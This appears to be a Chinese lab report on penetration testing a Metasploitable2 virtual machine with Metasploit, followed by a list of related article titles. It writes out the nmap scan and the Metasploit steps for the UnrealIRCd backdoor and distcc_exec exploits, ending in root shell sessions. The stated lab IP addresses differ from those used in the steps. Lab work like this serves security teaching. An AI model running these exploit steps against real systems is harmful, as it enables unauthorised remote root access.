一、实验目的
通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法
二、实验环境

漏洞主机:linux, IP 地址:10.1.1.136
攻击主机:Kali linux, IP地址:10.1.1.141

三、实验内容与实验要求
初步了解实验环境及漏洞信息搜集
利用UnrealIRCd后门漏洞攻击漏洞主机
利用Distcc后门漏洞攻击Metasploitable2漏洞主机
Distcc后门漏洞

四、实验过程与分析
查看Metasploitable2漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。使用命令如下:
whoami 查看当前登陆用户
ifconfig 查看网络配置信息

图2 查询漏洞主机信息
可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。
查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为192.168.220.141
whoami 查看当前登陆用户
ifconfig 查看网络配置信息

图3 查询攻击主机信息
扫描漏洞主机开放的端口,根据开放端口信息判断漏洞主机存在的安全问题。扫描结果如图4所示。执行Nmap对漏洞主机进行扫描,下述命令中各参数含义如下:-sT表示tcp端口扫描(完整三次握手),-v表示显示详细信息-v。使用命令:
利用口令: nmap -sT -v 192.168.220.136 扫描漏洞主机开发端口信息,扫描结果如下:

图4 扫描漏洞主机开发端口
实验步骤二
UnrealIRCd后门漏洞简介
安全组织索引
CVE:CVE-2010-2075
BID:BID-40820
OSVDB:OSVDB-65445
原理
在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
参考链接
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
影响系统/软件
Unreal UnrealIRCd 3.2.8.1
攻击步骤
分析可以利用的漏洞
Nmap扫描结果如图5所示,漏洞主机开启了大量的端口,也就意味着对外提供了大量的服务,增加了被攻击的风险。其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。

图5 扫描漏洞主机开发端口对应协议
开启Msfconsole
运行“msfconsole”命令开启msf,图6为MSF启动后的初始化界面,从图中可以看出v4.8.2-2014010101版本Metasploit包括了1246个EXP,678个辅助模块,324个负载,32个编码器,8个无操作生成器。

搜索漏洞利用EXP
运行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息

运行漏洞利用EXP
运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP

使用’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口

设置漏洞主机IP
运行“set RHOST 192.168.220.136 ”命令设置漏洞主机IP

  附:该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口。

执行EXP
运行“exploit”命令,提示“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:44972) at 2014-11-27 19:28:45 +0800”说明攻击成功,成功建立shell回话。

验证shell权限
运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制。

实验步骤三
安全组织索引
CVE:CVE-2004-2687
BID:无
OSVDB:OSVDB-13378
原理
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。
参考链接如下:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
http://metasploit.com/modules/exploit/unix/misc/distcc_exec
影响系统/软件
distcc 2.x
利用步骤
在kali中执行“msfconsole”命令,启动metasploit

运行命令:“ use exploit/unix/misc/distcc_exec”选择漏洞利用EXP

运行命令:“set RHOST 192.168.220.136”,设置漏洞主机的IP

运行命令:“exploit”,开始攻击,出现“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:58669) at 2014-11-27 20:00:27 +0800”说明shell建立成功

运行命令:“whoami”验证创立的shell的权限

Metasploit攻击linux实例相关推荐

  1. 2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例

    一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机. ...

  2. Metasploit攻击win7实例(上)

    一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...

  3. Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机

    攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessu ...

  4. linux php运行用户名和密码,Linux实例(一)使用用户名密码验证连接Linux

    本篇文章给大家带来的内容是关于使用用户名密码验证连接Linux,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助. 如果您使用的是 SSH 密钥对,请参考 使用SSH密钥对连接Linux实 ...

  5. kali初讲——Metasploit攻击ms17_010复现

    Metasploit攻击--ms17_010漏洞利用 文章目录 Metasploit攻击--ms17_010漏洞利用 导论 一.ms17_010简介 二.攻击使用模块 三..攻击思路 四.具体实施 总 ...

  6. Kali渗透测试:使用工具Metasploit攻击操作系统

    Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...

  7. putty保存用户名和密码_使用PuTTY远程登录软件登录 Linux 实例

    本文以 PuTTY 软件为例,介绍如何在 Windows 系统的本地电脑中使用远程登录软件登录 Linux 实例. 使用密码登录 下载 Windows 远程登录软件,即 PuTTY. PuTTY 的获 ...

  8. Linux 实例常用内核网络参数介绍与常见问题处理

    查看和修改 Linux 实例内核参数 方法一.通过 /proc/sys/ 目录 查看内核参数:使用 cat 查看对应文件的内容,例如执行命令 cat /proc/sys/net/ipv4/tcp_tw ...

  9. 亚马逊ec2 实例删除_亚马逊免费使用套餐:在EC2 Linux实例上安装Tomcat 7

    亚马逊ec2 实例删除 Amazon Web Services提供了12个月的免费使用期限,使开发人员可以在云中运行任何他们想要的东西. 免费层包括14个服务,其中Web开发人员最关注EC2服务. E ...

最新文章

  1. 前嗅ForeSpider教程:采集图片/视频/资源文件的链接地址
  2. 每日一皮:中关村地铁站和普通地铁站的区别
  3. string.Format 方法拼入{}
  4. XMLSpy编写DTD出错:Character 'D' is grammatically unexpected
  5. python保存文件到指定文件夹_python实现指定文件夹下的指定文件移动到指定位置...
  6. 在FLEX中获得当前PLAYER版本等信息.
  7. python实现一对一聊天_vue+django实现一对一聊天功能
  8. 人工智能与机器学习的关系---人工智能工作笔记0013
  9. 2012/7/26给Extjs grid中的列自定义渲染方式
  10. python学起来很蛋疼_一个初学者的辛酸路程-了解Python-2
  11. 高德 各省市区县poi及区划名称 代码/高德历史poi
  12. Python训练自己的语音识别系统
  13. 荐书 | 9本心理治疗书籍推荐
  14. 【Tableau Desktop 企业日常问题20】Tableau怎么折线变虚线?
  15. 百度世界大会全新打开方式!VR会场“希壤”上线
  16. spark mlib系列2
  17. R语言学习| 马氏距离mahanobis函数
  18. 什么是RC版本(转载)
  19. html5中图片热点,HTML5 创建热点图
  20. Kafka 核心原理(贼全面)

热门文章

  1. Unity 编辑器学习(二)之 全局光照(GI)
  2. java静态类如何赋值_Java如何读取配置文件并赋值静态变量
  3. 1.3 Latex页眉页脚设置
  4. 锐捷RIIL入驻西南交大 为智慧运维带来“七种武器”
  5. Unity 读取1-bit bmp图片文件
  6. U3D-亡命时速游戏制作(一)
  7. GCC总结、C语言关键字和运算符
  8. 工作杂谈(三)——笔记本电脑选购
  9. 带你玩一玩--> jQuery(一)
  10. Java 保存带Clob字段的数据